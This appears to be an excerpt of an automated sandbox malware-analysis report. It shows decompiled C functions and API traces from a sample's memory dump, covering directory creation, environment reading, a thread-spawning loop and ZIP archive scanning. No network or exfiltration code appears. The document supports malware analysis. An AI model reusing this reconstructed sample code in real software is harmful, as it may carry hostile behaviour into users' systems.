                                                0x02fafb3f
                                                0x02fafb41
                                                0x02fafb43
                                                0x02fafb49
                                                0x02fafb49
                                                0x02fafb4b
                                                0x02fafb4e
                                                0x02fafb4f
                                                0x02fafb55
                                                0x02fafb8b
                                                0x02fafb8b
                                                0x02fafb94
                                                0x02fafb9c
                                                0x02fafba0
                                                0x02fafba0
                                                0x02fafba2
                                                0x02fafba5
                                                0x02fafba9
                                                0x02fafba0
                                                0x02fafbad
                                                0x02fafbb0
                                                0x02fafbb0
                                                0x02fafbb2
                                                0x02fafbb3
                                                0x02fafbbd
                                                0x02fafbbf
                                                0x02fafbc0
                                                0x02fafbc0
                                                0x02fafbc3
                                                0x02fafbc4
                                                0x02fafbd0
                                                0x02fafbd3
                                                0x02fafbe7
                                                0x02fafbf2
                                                0x02fafbf2
                                                0x00000000
                                                0x02fafb57
                                                0x02fafb57
                                                0x02fafb62
                                                0x02fafb67
                                                0x02fafb70
                                                0x02fafc08
                                                0x02fafc0d
                                                0x02fafc0e
                                                0x02fafc0f
                                                0x02fafc10
                                                0x02fafc11
                                                0x02fafc13
                                                0x02fafc19
                                                0x02fafc20
                                                0x02fafc23
                                                0x02fafc24
                                                0x02fafc27
                                                0x02fafc28
                                                0x02fafc2a
                                                0x02fafc2e
                                                0x02fafc32
                                                0x02fafc32
                                                0x02fafc37
                                                0x02fafc39
                                                0x02fafc3c
                                                0x02fafc43
                                                0x02fafc46
                                                0x02fafc5f
                                                0x02fafc62
                                                0x02fafc66
                                                0x02fafc6b
                                                0x02fafc6b
                                                0x02fafc6e
                                                0x02fafc70
                                                0x02fafc71
                                                0x02fafc74
                                                0x02fafc76
                                                0x02fafc76
                                                0x02fafc78
                                                0x02fafc7a
                                                0x02fafc7c
                                                0x02fafc80
                                                0x02fafc85
                                                0x02fafc86
                                                0x02fafc89
                                                0x02fafc9c
                                                0x02fafc9f
                                                0x02fafca2
                                                0x02fafca2
                                                0x02fafca7
                                                0x02fafcaf
                                                0x02fafcb4
                                                0x02fafcb7
                                                0x02fafcbc
                                                0x02fafcbe
                                                0x02fafcbe
                                                0x02fafcbf
                                                0x02fafcbf
                                                0x02fafc89
                                                0x02fafc80
                                                0x02fafcc2
                                                0x02fafcc4
                                                0x02fafcc4
                                                0x02fafc76
                                                0x02fafcd3
                                                0x02fafcd8
                                                0x02fafcdf
                                                0x02fafce1
                                                0x02fafd1b
                                                0x02fafd1d
                                                0x02fafd1f
                                                0x02fafd21
                                                0x02fafd23
                                                0x02fafd25
                                                0x02fafd2b
                                                0x02fafd2b
                                                0x02fafd2b
                                                0x02fafd27
                                                0x02fafd27
                                                0x02fafd29
                                                0x00000000
                                                0x00000000
                                                0x02fafd29
                                                0x02fafd2e
                                                0x02fafd2e
                                                0x02fafd31
                                                0x02fafd32
                                                0x02fafd32
                                                0x02fafd3c
                                                0x02fafd3e
                                                0x02fafd3e
                                                0x02fafd40
                                                0x02fafd40
                                                0x02fafd42
                                                0x02fafd42
                                                0x02fafd45
                                                0x02fafd49
                                                0x02fafd49
                                                0x02fafd4d
                                                0x02fafd4f
                                                0x02fafd5b
                                                0x02fafd5d
                                                0x02fafd62
                                                0x02faff08
                                                0x02faff0d
                                                0x02faff0e
                                                0x02faff0f
                                                0x02faff10
                                                0x02faff11
                                                0x02faff13
                                                0x02faff14
                                                0x02faff18
                                                0x02faff1c
                                                0x02faff1c
                                                0x02faff21
                                                0x02faff23
                                                0x02faff2a
                                                0x02faff2c
                                                0x02faff2e
                                                0x02faff32
                                                0x02faff36
                                                0x02faff36
                                                0x02faff3b
                                                0x02faff3c
                                                0x02faff3e
                                                0x02faff40
                                                0x02faff42
                                                0x02faff46
                                                0x02faff4b
                                                0x02faff4b
                                                0x02faff51
                                                0x02faff54
                                                0x02faff59
                                                0x02faff59
                                                0x02faff5d
                                                0x02faff65
                                                0x02faff66
                                                0x02faff69
                                                0x02faff6c
                                                0x02fafd68
                                                0x02fafd68
                                                0x02fafd70
                                                0x02fafd76
                                                0x02fafd78
                                                0x02fafdb3
                                                0x02fafdc7
                                                0x02fafdcd
                                                0x02fafdd0
                                                0x02fafdd0
                                                0x02fafd7a
                                                0x02fafd7a
                                                0x02fafd7c
                                                0x00000000
                                                0x02fafd7e
                                                0x02fafd7e
                                                0x02fafd80
                                                0x00000000
                                                0x02fafd82
                                                0x02fafd82
                                                0x02fafd89
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fafd89
                                                0x02fafd80
                                                0x02fafd7c
                                                0x00000000
                                                0x02fafd78
                                                0x02fafd51
                                                0x02fafd51
                                                0x02fafd8b
                                                0x02fafd93
                                                0x02fafda6
                                                0x02fafdac
                                                0x02fafdaf
                                                0x02fafdd2
                                                0x02fafdd8
                                                0x02fafdf7
                                                0x02fafdfd
                                                0x02fafdff
                                                0x02fafe02
                                                0x02fafe24
                                                0x02fafe29
                                                0x02fafe30
                                                0x02fafe32
                                                0x02fafe37
                                                0x02fafe3c
                                                0x02fafe3f
                                                0x02fafe3f
                                                0x02fafe45
                                                0x02fafe50
                                                0x02fafe50
                                                0x02fafe64
                                                0x02fafe69
                                                0x02fafe6b
                                                0x02fafe6e
                                                0x02fafe71
                                                0x00000000
                                                0x00000000
                                                0x02fafe73
                                                0x02fafe75
                                                0x02fafea1
                                                0x02fafea1
                                                0x02fafe77
                                                0x02fafe77
                                                0x02fafe94
                                                0x02fafe94
                                                0x02fafe9b
                                                0x02fafecf
                                                0x02fafe9d
                                                0x02fafe9d
                                                0x02fafe9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fafe9f
                                                0x02fafe79
                                                0x02fafe8a
                                                0x02fafe90
                                                0x02fafe92
                                                0x02fafead
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fafe92
                                                0x02fafe77
                                                0x02fafee1
                                                0x02fafee2
                                                0x02fafeea
                                                0x02fafef8
                                                0x02fafefa
                                                0x02faff05
                                                0x00000000
                                                0x02faff05
                                                0x02fafed7
                                                0x00000000
                                                0x02fafe04
                                                0x02fafe04
                                                0x02fafe0f
                                                0x02fafe19
                                                0x02fafe19
                                                0x02fafe02
                                                0x02fafce3
                                                0x02fafce3
                                                0x02fafce5
                                                0x02fafcfd
                                                0x02fafcfd
                                                0x02fafcfd
                                                0x02fafce7
                                                0x02fafce7
                                                0x02fafce9
                                                0x00000000
                                                0x02fafceb
                                                0x02fafceb
                                                0x02fafced
                                                0x02fafcf5
                                                0x02fafcf5
                                                0x02fafcef
                                                0x02fafcef
                                                0x02fafcf3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fafcf3
                                                0x02fafced
                                                0x02fafce9
                                                0x02fafd01
                                                0x02fafd06
                                                0x02fafd0e
                                                0x02fafd18
                                                0x02fafd18
                                                0x02fafc48
                                                0x02fafc52
                                                0x02fafc5c
                                                0x02fafc5c
                                                0x02fafb76
                                                0x02fafb7c
                                                0x02fafb86
                                                0x00000000
                                                0x02fafb86
                                                0x02fafb70
                                                0x02fafb55
                                                0x00000000

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000000,?,02FA5104), ref: 02FAFB1E
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02FAFB2C
                                                • GetFileAttributesA.KERNEL32(00000000,?,?,02FA5104), ref: 02FAFBDD
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02FAFBF2
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: AttributesCreateDirectoryFile
                                                • String ID:
                                                • API String ID: 3401506121-0
                                                • Opcode ID: 86c0e41b8f6fe393f71857de46e12cc6c33949a2caebb1daa55aa3b5312534a8
                                                • Instruction ID: 37a4c52857ea93cbeb4d81cb7dd93446a785cc9f8609bb23c128320df35597d7
                                                • Opcode Fuzzy Hash: 86c0e41b8f6fe393f71857de46e12cc6c33949a2caebb1daa55aa3b5312534a8
                                                • Instruction Fuzzy Hash: 5A41587190120A9BCB20CE28D8B0BE9F775AF453E0F50479DDAA59B681CB72594A8A90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FBAF7A Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E02FBAF7A() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t8;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E02FBAF43(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E02FB7882(_t19, _t7); // executed
						_t25 = _t8;
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E02FB7848(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}













                                                0x02fbaf89
                                                0x02fbaf8f
                                                0x02fbafe7
                                                0x02fbafe7
                                                0x02fbaf91
                                                0x02fbaf92
                                                0x02fbaf97
                                                0x02fbafa0
                                                0x02fbafa6
                                                0x02fbafac
                                                0x02fbafb1
                                                0x00000000
                                                0x02fbafb3
                                                0x02fbafb4
                                                0x02fbafb9
                                                0x02fbafbe
                                                0x02fbafdc
                                                0x02fbafd6
                                                0x02fbafd6
                                                0x02fbafd8
                                                0x02fbafd8
                                                0x02fbafdf
                                                0x02fbafe4
                                                0x02fbafb1
                                                0x02fbafeb
                                                0x02fbafee
                                                0x02fbafee
                                                0x02fbaffc

                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 02FBAF83
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02FBAFA6
                                                  • Part of subcall function 02FB7882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB78B4
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02FBAFCC
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02FBAFEE
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                • String ID:
                                                • API String ID: 1794362364-0
                                                • Opcode ID: 3d912a172855b927f53c5ffe2488129573384ba7ab8ce08097687513bac69e92
                                                • Instruction ID: acb5ec188bacb47d35718520d0d55c11661b4679c37b5decc308eafbf6fa7cac
                                                • Opcode Fuzzy Hash: 3d912a172855b927f53c5ffe2488129573384ba7ab8ce08097687513bac69e92
                                                • Instruction Fuzzy Hash: 3F0171B3B452197F272315B75D8CCFBB96DDEC2AE53240129FA14D7200DF618D0285B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAE0D0 Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E02FAE0D0(CHAR* __ecx, long* _a8) {
				void* _v8;
				void* __esi;
				void* _t12;
				long _t13;
				void* _t15;
				long _t17;
				signed int _t19;
				signed int _t20;
				long* _t24;
				void* _t27;
				char* _t28;

				_push(__ecx);
				_t24 = _a8;
				 *_t24 = 0; // executed
				_t12 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v8 = _t12;
				if(_t12 != 0xffffffff) {
					_push(_t19);
					_push(_t27);
					_t13 = SetFilePointer(_t12, 0, 0, 1); // executed
					__eflags = _t13 - 0xffffffff;
					_t20 = _t19 & 0xffffff00 | __eflags != 0x00000000;
					_t28 = E02FB0A6E(_t27, __eflags, 0x20);
					_t15 = _v8;
					 *_t28 = 1;
					 *((char*)(_t28 + 0x10)) = 1;
					 *(_t28 + 1) = _t20;
					 *(_t28 + 4) = _t15;
					 *((char*)(_t28 + 8)) = 0;
					 *(_t28 + 0xc) = 0;
					__eflags = _t20;
					if(_t20 != 0) {
						_t17 = SetFilePointer(_t15, 0, 0, 1); // executed
						 *(_t28 + 0xc) = _t17;
					}
					 *_t24 = 0;
					return _t28;
				} else {
					 *_t24 = 0x200;
					return 0;
				}
			}














                                                0x02fae0d3
                                                0x02fae0d5
                                                0x02fae0eb
                                                0x02fae0f1
                                                0x02fae0f7
                                                0x02fae0fd
                                                0x02fae10c
                                                0x02fae10d
                                                0x02fae115
                                                0x02fae11b
                                                0x02fae120
                                                0x02fae128
                                                0x02fae12d
                                                0x02fae130
                                                0x02fae133
                                                0x02fae137
                                                0x02fae13a
                                                0x02fae13d
                                                0x02fae141
                                                0x02fae148
                                                0x02fae14a
                                                0x02fae153
                                                0x02fae159
                                                0x02fae159
                                                0x02fae15e
                                                0x02fae16a
                                                0x02fae0ff
                                                0x02fae0ff
                                                0x02fae10b
                                                0x02fae10b

                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000140,?,?,02FAF440,00000141,FFFFFFFF,?,02FAFFE1,?), ref: 02FAE0F1
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000001,?,02FAF440,00000141,FFFFFFFF,?,02FAFFE1,?,?,00000244,93AD1EEA), ref: 02FAE115
                                                • new.LIBCMT ref: 02FAE123
                                                • SetFilePointer.KERNELBASE(FFFFFFFF,00000000,00000000,00000001), ref: 02FAE153
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$Pointer$Create
                                                • String ID:
                                                • API String ID: 250661774-0
                                                • Opcode ID: 08cf81a296f78e8fe80da8815385f9365788f3fa93ebe5cacd015834da67d455
                                                • Instruction ID: 4660cee58e2a91d4cfbf0e435b8332ec0948d99627f84dd257d55844020fdaad
                                                • Opcode Fuzzy Hash: 08cf81a296f78e8fe80da8815385f9365788f3fa93ebe5cacd015834da67d455
                                                • Instruction Fuzzy Hash: F211C871684305BBF7308F68DC0AB86FBD89B01760F204659F655AB3C0D7F575508754
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAB470 Relevance: 6.0, APIs: 4, Instructions: 32sleepthreadCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02FAB470() {
				void* _v8;

				 *0x2fd6a48 = 0;
				L1:
				if( *0x2fd6a48 < 0x40) {
					_v8 = 0;
					if(E02FAB660( &_v8) != 1) {
						CreateThread(0, 0, E02FAB3C0, _v8, 0, 0); // executed
						Sleep(0xa); // executed
					} else {
						Sleep(0x1e); // executed
					}
				} else {
					Sleep(0x12c);
				}
				goto L1;
			}




                                                0x02fab482
                                                0x02fab490
                                                0x02fab497
                                                0x02fab4a5
                                                0x02fab4b4
                                                0x02fab4cc
                                                0x02fab4d0
                                                0x02fab4b6
                                                0x02fab4b8
                                                0x02fab4b8
                                                0x02fab499
                                                0x02fab49e
                                                0x02fab49e
                                                0x00000000

                                                APIs
                                                • Sleep.KERNEL32(0000012C), ref: 02FAB49E
                                                • Sleep.KERNELBASE(0000001E), ref: 02FAB4B8
                                                • CreateThread.KERNELBASE(00000000,00000000,02FAB3C0,00000000,00000000,00000000), ref: 02FAB4CC
                                                • Sleep.KERNELBASE(0000000A), ref: 02FAB4D0
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Sleep$CreateThread
                                                • String ID:
                                                • API String ID: 3220764680-0
                                                • Opcode ID: 87a6c49fbaae4d8d19a13349be0c0bf972bfb754d7973d6c941e61b2effe6d88
                                                • Instruction ID: 4f9982b8ef48148891cab10ff9c0f632096f544cfa668d9ff00c901b0b788a54
                                                • Opcode Fuzzy Hash: 87a6c49fbaae4d8d19a13349be0c0bf972bfb754d7973d6c941e61b2effe6d88
                                                • Instruction Fuzzy Hash: E5F0E2B5EC030CFBE6109FE0DE11F0CBA28AB25B98F604004EB04AA2C082F078408FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAE170 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02FAE170(char* __ecx, long __edx, LONG* _a4) {
				LONG* _t13;
				LONG* _t19;

				if( *__ecx == 0) {
					_t13 = _a4;
					if(_t13 != 0) {
						if(_t13 != 1) {
							if(_t13 == 2) {
								 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x18)) + __edx;
							}
							return 0;
						} else {
							 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + __edx;
							return 0;
						}
					} else {
						 *((intOrPtr*)(__ecx + 0x1c)) = __edx;
						return _t13;
					}
				} else {
					if( *((char*)(__ecx + 1)) == 0) {
						return 0x1d;
					} else {
						_t19 = _a4;
						if(_t19 != 0) {
							if(_t19 != 1) {
								if(_t19 != 2) {
									return 0x13;
								} else {
									SetFilePointer( *(__ecx + 4), __edx, 0, _t19); // executed
									return 0;
								}
							} else {
								SetFilePointer( *(__ecx + 4), __edx, 0, _t19);
								return 0;
							}
						} else {
							SetFilePointer( *(__ecx + 4),  *((intOrPtr*)(__ecx + 0xc)) + __edx, _t19, _t19); // executed
							return 0;
						}
					}
				}
			}





                                                0x02fae176
                                                0x02fae1d4
                                                0x02fae1d9
                                                0x02fae1e3
                                                0x02fae1ef
                                                0x02fae1f6
                                                0x02fae1f6
                                                0x02fae1fc
                                                0x02fae1e5
                                                0x02fae1e5
                                                0x02fae1eb
                                                0x02fae1eb
                                                0x02fae1db
                                                0x02fae1db
                                                0x02fae1df
                                                0x02fae1df
                                                0x02fae178
                                                0x02fae17c
                                                0x02fae1d3
                                                0x02fae17e
                                                0x02fae17e
                                                0x02fae183
                                                0x02fae19d
                                                0x02fae1b3
                                                0x02fae1cc
                                                0x02fae1b5
                                                0x02fae1bc
                                                0x02fae1c5
                                                0x02fae1c5
                                                0x02fae19f
                                                0x02fae1a6
                                                0x02fae1af
                                                0x02fae1af
                                                0x02fae185
                                                0x02fae190
                                                0x02fae199
                                                0x02fae199
                                                0x02fae183
                                                0x02fae17c

                                                APIs
                                                • SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,02FAE3D2,00000002,00000001,?,?,?,02FAE570,?,00000000,00000001), ref: 02FAE190
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,02FAE3D2,00000002,00000001,?,?,?,02FAE570,?,00000000,00000001), ref: 02FAE1A6
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: d0be27af45ae7ebd75df9b0e949a4b4594ccc641f627206d754a318808fc8fe9
                                                • Instruction ID: 21f28a2635ce217612ec7065c0bed203590a21b95f840a9960cd79fc5bfd217c
                                                • Opcode Fuzzy Hash: d0be27af45ae7ebd75df9b0e949a4b4594ccc641f627206d754a318808fc8fe9
                                                • Instruction Fuzzy Hash: 551165B1A441146FFB14CF64EC55B35379DDB8535CF3488B5F50CCA551E323D8569A40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAE3C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E02FAE3C0(char* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				signed int _t46;
				signed int _t48;
				intOrPtr _t49;
				long _t54;
				struct _OVERLAPPED* _t55;
				signed int _t58;
				void* _t60;
				intOrPtr _t61;
				int _t63;
				long _t65;
				intOrPtr* _t67;
				intOrPtr _t69;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t84;
				long _t87;
				void* _t91;
				void* _t94;
				void* _t95;
				void* _t96;

				_t68 = __ecx;
				_t67 = __ecx; // executed
				_t46 = E02FAE170(__ecx, 0, 2); // executed
				_t95 = _t94 + 4;
				if(_t46 == 0) {
					if( *__ecx == 0) {
						_t84 =  *((intOrPtr*)(__ecx + 0x1c));
						goto L7;
					} else {
						if( *((char*)(__ecx + 1)) == 0) {
							_t84 = 0;
							_v16 = 0;
							goto L8;
						} else {
							_t65 = SetFilePointer( *(__ecx + 4), 0, 0, 1); // executed
							_t84 = _t65 -  *((intOrPtr*)(_t67 + 0xc));
							L7:
							_v16 = _t84;
							_v12 = 0xffff;
							if(_t84 < 0xffff) {
								L8:
								_v12 = _t84;
							}
						}
					}
					_push(0x404);
					_t48 = E02FB5A3B(_t68);
					_t91 = _t48;
					_t96 = _t95 + 4;
					if(_t91 != 0) {
						_t69 = _v12;
						_t49 = 4;
						_v8 = 0xffffffff;
						if(_t69 > 4) {
							while(1) {
								_t78 =  >  ? _t69 : _t49 + 0x400;
								_t54 = _t84 - _t78;
								_v32 = _t78;
								_v28 = _t54;
								_t87 =  >  ? 0x404 : _t84 - _t54;
								_t55 = E02FAE170(_t67, _t54, 0); // executed
								_t96 = _t96 + 4;
								if(_t55 != 0) {
									goto L31;
								}
								_t72 = _t87;
								_v20 = _t87;
								if( *_t67 == _t55) {
									_t80 =  *((intOrPtr*)(_t67 + 0x1c));
									if(_t80 + _t87 >  *((intOrPtr*)(_t67 + 0x18))) {
										_t72 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
										_v20 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
									}
									E02FC3DB0(_t91,  *((intOrPtr*)(_t67 + 0x14)) + _t80, _t72);
									_t58 = _v20;
									_t96 = _t96 + 0xc;
									 *((intOrPtr*)(_t67 + 0x1c)) =  *((intOrPtr*)(_t67 + 0x1c)) + _t58;
								} else {
									_t63 = ReadFile( *(_t67 + 4), _t91, _t87,  &_v24, _t55); // executed
									if(_t63 == 0) {
										 *((char*)(_t67 + 8)) = 1;
									}
									_t58 = _v24;
								}
								if(_t58 / _t87 == 1) {
									_t60 = _t87 - 3;
									if(_t60 < 0) {
										L28:
										_t61 = _v8;
									} else {
										while(1) {
											_t60 = _t60 - 1;
											if( *((char*)(_t60 + _t91)) == 0x50 &&  *((char*)(_t60 + _t91 + 1)) == 0x4b &&  *((char*)(_t60 + _t91 + 2)) == 5 &&  *((char*)(_t60 + _t91 + 3)) == 6) {
												break;
											}
											if(_t60 >= 0) {
												continue;
											} else {
												goto L28;
											}
											goto L29;
										}
										_t61 = _t60 + _v28;
										_v8 = _t61;
									}
									L29:
									if(_t61 == 0) {
										_t69 = _v12;
										_t49 = _v32;
										_t84 = _v16;
										if(_t49 < _t69) {
											continue;
										}
									}
								}
								goto L31;
							}
						}
						L31:
						L02FB5A36(_t91);
						return _v8;
					} else {
						return _t48 | 0xffffffff;
					}
				} else {
					return _t46 | 0xffffffff;
				}
			}






























                                                0x02fae3c0
                                                0x02fae3cb
                                                0x02fae3cd
                                                0x02fae3d2
                                                0x02fae3d7
                                                0x02fae3e5
                                                0x02fae40a
                                                0x00000000
                                                0x02fae3e7
                                                0x02fae3eb
                                                0x02fae403
                                                0x02fae405
                                                0x00000000
                                                0x02fae3ed
                                                0x02fae3f6
                                                0x02fae3fe
                                                0x02fae40d
                                                0x02fae412
                                                0x02fae415
                                                0x02fae41a
                                                0x02fae41c
                                                0x02fae41c
                                                0x02fae41c
                                                0x02fae41a
                                                0x02fae3eb
                                                0x02fae420
                                                0x02fae425
                                                0x02fae42a
                                                0x02fae42c
                                                0x02fae431
                                                0x02fae43d
                                                0x02fae440
                                                0x02fae445
                                                0x02fae44e
                                                0x02fae454
                                                0x02fae45f
                                                0x02fae467
                                                0x02fae469
                                                0x02fae46e
                                                0x02fae47b
                                                0x02fae480
                                                0x02fae485
                                                0x02fae48a
                                                0x00000000
                                                0x00000000
                                                0x02fae490
                                                0x02fae492
                                                0x02fae497
                                                0x02fae4b6
                                                0x02fae4bf
                                                0x02fae4c4
                                                0x02fae4c6
                                                0x02fae4c6
                                                0x02fae4d1
                                                0x02fae4d6
                                                0x02fae4d9
                                                0x02fae4dc
                                                0x02fae499
                                                0x02fae4a3
                                                0x02fae4ab
                                                0x02fae4ad
                                                0x02fae4ad
                                                0x02fae4b1
                                                0x02fae4b1
                                                0x02fae4e6
                                                0x02fae4e8
                                                0x02fae4ed
                                                0x02fae510
                                                0x02fae510
                                                0x02fae4f0
                                                0x02fae4f0
                                                0x02fae4f0
                                                0x02fae4f5
                                                0x00000000
                                                0x00000000
                                                0x02fae50e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fae50e
                                                0x02fae53b
                                                0x02fae53e
                                                0x02fae53e
                                                0x02fae513
                                                0x02fae515
                                                0x02fae517
                                                0x02fae51a
                                                0x02fae51d
                                                0x02fae522
                                                0x00000000
                                                0x00000000
                                                0x02fae522
                                                0x02fae515
                                                0x00000000
                                                0x02fae4e6
                                                0x02fae454
                                                0x02fae528
                                                0x02fae529
                                                0x02fae53a
                                                0x02fae433
                                                0x02fae43c
                                                0x02fae43c
                                                0x02fae3d9
                                                0x02fae3e0
                                                0x02fae3e0

                                                APIs
                                                  • Part of subcall function 02FAE170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,02FAE3D2,00000002,00000001,?,?,?,02FAE570,?,00000000,00000001), ref: 02FAE190
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,00000000,00000001,?,?,?,02FAE570,?,00000000,00000001), ref: 02FAE3F6
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 54eb87cd58436f838b0f231177af3f4da81acb2e762dc4f954ee75acbbca4ba9
                                                • Instruction ID: 1f6527889eb9da327cd4be614ba641cd92a03691515f783c6cc80918da87a357
                                                • Opcode Fuzzy Hash: 54eb87cd58436f838b0f231177af3f4da81acb2e762dc4f954ee75acbbca4ba9
                                                • Instruction Fuzzy Hash: 5E41F2F1F002059FEF24CE69DD9476EBBAA9F85394F1481B9DA09DB382E730D9518B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAFF70 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E02FAFF70(void* __eflags) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _v20;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t12;
				intOrPtr _t16;
				intOrPtr* _t17;
				void* _t20;
				intOrPtr* _t28;
				signed int _t35;

				_push(0xffffffff);
				_push(E02FC47B2);
				_push( *[fs:0x0]);
				_push(_t20);
				_t12 =  *0x2fcf008; // 0x93ad1eea
				_push(_t12 ^ _t35);
				 *[fs:0x0] =  &_v16;
				_t32 = _t20;
				_t28 = E02FB0A6E(_t20, __eflags, 0x244);
				_v20 = _t28;
				_push(_t20);
				_t21 = _t28;
				 *_t28 = 0;
				 *((intOrPtr*)(_t28 + 4)) = 0xffffffff;
				 *((intOrPtr*)(_t28 + 0x134)) = 0xffffffff;
				 *((intOrPtr*)(_t28 + 0x138)) = 0;
				 *((intOrPtr*)(_t28 + 0x13c)) = 0;
				_v8 = 0xffffffff;
				_t16 = E02FAF3D0(_t28, _t28, _t32); // executed
				 *0x2fd6a4c = _t16;
				if(_t16 == 0) {
					_t17 = E02FB0A6E(_t32, __eflags, 8);
					 *_t17 = 1;
					 *((intOrPtr*)(_t17 + 4)) = _t28;
					 *[fs:0x0] = _v16;
					return _t17;
				} else {
					E02FB0030(_t28, _t21);
					 *[fs:0x0] = _v16;
					return 0;
				}
			}















                                                0x02faff73
                                                0x02faff75
                                                0x02faff80
                                                0x02faff81
                                                0x02faff84
                                                0x02faff8b
                                                0x02faff8f
                                                0x02faff95
                                                0x02faffa1
                                                0x02faffa3
                                                0x02faffa6
                                                0x02faffa8
                                                0x02faffaa
                                                0x02faffb0
                                                0x02faffb7
                                                0x02faffc1
                                                0x02faffcb
                                                0x02faffd5
                                                0x02faffdc
                                                0x02faffe1
                                                0x02faffe8
                                                0x02fb0007
